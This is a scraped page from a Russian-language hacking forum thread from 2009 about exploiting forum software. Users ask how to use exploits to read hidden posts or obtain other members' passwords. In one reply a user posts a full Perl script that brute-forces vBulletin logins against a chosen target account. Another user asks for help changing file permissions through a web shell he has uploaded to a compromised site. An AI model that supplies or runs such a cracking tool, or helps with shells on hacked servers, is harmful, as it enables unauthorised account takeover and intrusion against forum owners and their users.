HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу [Задай Вопрос - Получи Ответ]
   
Ответ
Страница 20 из 32 « Первая < 10 16 17 18 19 20 21 22 23 24 30 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.05.2009, 21:42
25:17
Banned
Регистрация: 07.05.2009
Сообщений: 11
С нами: 8954306

Репутация: 11
По умолчанию
Цитата:
Сообщение от SF_Death  
Здравствуйте. Мне хотелось бы увидеть находящееся на одном форуме под хайдом. Я решил попробовать использовать эксплоиты. На https://forum.antichat.ru/threadnav22852-6-10.html да и на других сайтах, например http://www.milw0rm.com/exploits/7174 или http://securityvulns.ru/Udocument391.html есть эксплоиты, но объяснений ровно 0 Подскажите пожалуйста, куда пихать этот код, какие параметры как заполнять.. и, если не сложно, что добавить, чтоб узнать пасс от чьего-нибудь акка или просто просмотреть хайд

ЗЫ ботский пост получился, но я не бот, нормальное объяснение пойму. Просто первый раз имею дело с эксплоитами.
сначала определи версию движка, а потом учитывая версию ищи под него сплоит, если такой найдется, то почитай руководство к использованию, того на чем написан сплоит, обычно php или perl
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 16.05.2009, 10:18
nonamez
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
С нами: 9897010

Репутация: 766


По умолчанию
народ, а на сколько безопасен форум смф?
 
Ответить с цитированием

  #3  
Старый 17.05.2009, 14:29
yaroslav-ranger
Новичок
Регистрация: 14.12.2008
Сообщений: 5
С нами: 9161484

Репутация: 0
По умолчанию
люди, существует вообще брут аков с булки? если да, то чирканите плз
 
Ответить с цитированием

  #4  
Старый 17.05.2009, 16:58
Que$t
Новичок
Регистрация: 01.04.2009
Сообщений: 12
С нами: 9006268

Репутация: 23
По умолчанию
Цитата:
Сообщение от yaroslav-ranger  
люди, существует вообще брут аков с булки? если да, то чирканите плз
Да)
Код:
#!/usr/bin/perl

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use Time::HiRes qw(gettimeofday);

$host = $ARGV[0];
$usern = $ARGV[1];
$passw = $ARGV[2];
$uname = $ARGV[3];
$url = "http://".$host;
$alpha = "abcdefghijklmnopqrstuvwxyz"; #charset
$charcount = 24; #number of chars in $alpha
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
$count = 0;
$logins = 0;
$minchars = 1; #min chars
$maxchars = 10; #max chars

print q(

###########################################################
#                vBulletin brute forcer                   #
#              http://www.unnamedone.com                  #
#               brian_denys@hotmail.com                   #
#                  09 - April - 2008                      #
################## Coded By UnnamedOne ####################

);

if (@ARGV < 4)

{

   print " #  Я не отвечаю за что-нибудь, что вы удовлетворяетесь с этим!\n";
   print " #  Тестировалось только версиях  vBulletin 3.6.8 and 3.7.0!\n";
   print " #  usage : vbrute.pl [host & path] [user] [pass] [target]\n";
   print " #  E.g : vbrute.pl www.milw0rm.com/vBulletin3.6.8/ UnnamedOne MyPass str0ke\n";

   exit();

}

fakelogin();
for(my $t=$minchars;$t<=$maxchars;$t++)
{
   crack($t);
}

sub fakelogin {
   $xplr = LWP::UserAgent->new() or die;
   $cookie_jarr = HTTP::Cookies->new();
   $xplr->cookie_jar( $cookie_jarr );
   $resr = $xplr->post($url.'login.php?do=login',
   Content => [
   "vb_login_username"   => "$usern",
   "vb_login_password"   => "$passw",
   "do"      => "login",
   ],);
   if($cookie_jarr->as_string =~ /IDstack=(.*?);/) {
      #Do nothing..
   }

   else

   {
      #print $cookie_jarr->as_string;
      print "Forum not vulnerable or wrong username / password.\n";
      exit();

   }

}

sub crack {

   $xpl = LWP::UserAgent->new() or die;
   $cookie_jar = HTTP::Cookies->new();
   $CharSet = shift;
   @RawString = ();
   for (my $i =0;$i<$CharSet;$i++) {
      $RawString[i] = 0;
   }
   $Start = gettimeofday();
   do {
      for (my $i =0;$i<$CharSet;$i++)
      {
         if ($RawString[$i] > length($alpha)-1) {
            if ($i==$CharSet-1) {
               $cnt = 0;
               return false;
            }
            $RawString[$i+1]++;
            $RawString[$i]=0;
         }
      }
      $ret = "";
      for (my $i =0;$i<$CharSet;$i++) {
         $ret = $ret . substr($alpha,$RawString[$i],1);
      }
      $count++;
      if($count == 4) {
         fakelogin();
         $count = 0;
      }
      $xpl->cookie_jar( $cookie_jar );
      $res = $xpl->post($url.'login.php?do=login',
      Content => [

      "vb_login_username"   => "$uname",
      "vb_login_password"   => "$ret",
      "do"      => "login",

      ],);
      $cnt++;
      $Stop = gettimeofday();
      if ($Stop-$Start>$dbgtmr) {
         $cnt = int($cnt/$dbgtmr);
         $Start = gettimeofday();

      }

      $logins++;
      system("clear");
      $pro = ($logins / ($charcount * $maxchars));
      print "Current password: $ret\n";
      print "Login attempts: $logins\n";
      print "Cracking speed: $cnt passwords/sec\n";
      print "$pro% finished.\n";

      $cnt = 0;

      if($cookie_jar->as_string =~ /IDstack=(.*?);/) {
         print "Password cracked! => $ret\n";
         exit();
      }

      $RawString[0]++;
   }while($RawString[$CharSet-1]<length($alpha));

}
 
Ответить с цитированием

  #5  
Старый 17.05.2009, 17:09
yaroslav-ranger
Новичок
Регистрация: 14.12.2008
Сообщений: 5
С нами: 9161484

Репутация: 0
По умолчанию
пасиб, щас попробую с ним разобратся ещё

всё, разобрался))
Последний раз редактировалось yaroslav-ranger; 17.05.2009 в 17:15.. Причина: разобрался
 
Ответить с цитированием

  #6  
Старый 17.05.2009, 20:50
SF_Death
Новичок
Регистрация: 28.08.2008
Сообщений: 2
С нами: 9316598

Репутация: 0
По умолчанию
А разве на булке нет ограничения неправильных вводов пароля?

И куда этот код пихать? В компилятор perl? Или заливать на хостинг с поддержкой перла?
 
Ответить с цитированием

  #7  
Старый 06.06.2009, 09:54
Rodriguez_75
Новичок
Регистрация: 24.05.2009
Сообщений: 2
С нами: 8930106

Репутация: 1
По умолчанию
кто разбирается в форумах пхпбб отпишите 459902747
 
Ответить с цитированием

  #8  
Старый 09.06.2009, 07:56
zannussi
Познающий
Регистрация: 22.05.2008
Сообщений: 53
С нами: 9458176

Репутация: 15
По умолчанию
Ребята, скажите где можно скачать vBulletin 3.5.3? чтоб можно было его поюзать, посмотреть исходники?
vBulletin.com не предлагать, там реитсрация нужна и покупка лицензии.
 
Ответить с цитированием

  #9  
Старый 09.06.2009, 09:01
Komyak
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
С нами: 9116253

Репутация: 26
По умолчанию
Возник вопрос с чемодом. Плохо разбираюсь. После заливки шелла пытаюсь поменять права на доступ, но постоянно выдаёт ошибку. Если и могу изменить, то только в "меньшую" сторону. Подскажите, может что не так делаю? В madShell отмечаю файл(папку) и выбираю чемод, выставляю нужные мне права, но после нажатия кнопки сохранить вылетает ошибка.
 
Ответить с цитированием

  #10  
Старый 09.06.2009, 09:27
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию
Цитата:
Сообщение от Komyak  
Возник вопрос с чемодом. Плохо разбираюсь. После заливки шелла пытаюсь поменять права на доступ, но постоянно выдаёт ошибку. Если и могу изменить, то только в "меньшую" сторону. Подскажите, может что не так делаю? В madShell отмечаю файл(папку) и выбираю чемод, выставляю нужные мне права, но после нажатия кнопки сохранить вылетает ошибка.
Ну у тебя прав нету..чтобы изменить чмод на данную папку.)..
Ну или..что за ошибка?)
 
Ответить с цитированием
Ответ
Страница 20 из 32 « Первая < 10 16 17 18 19 20 21 22 23 24 30 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.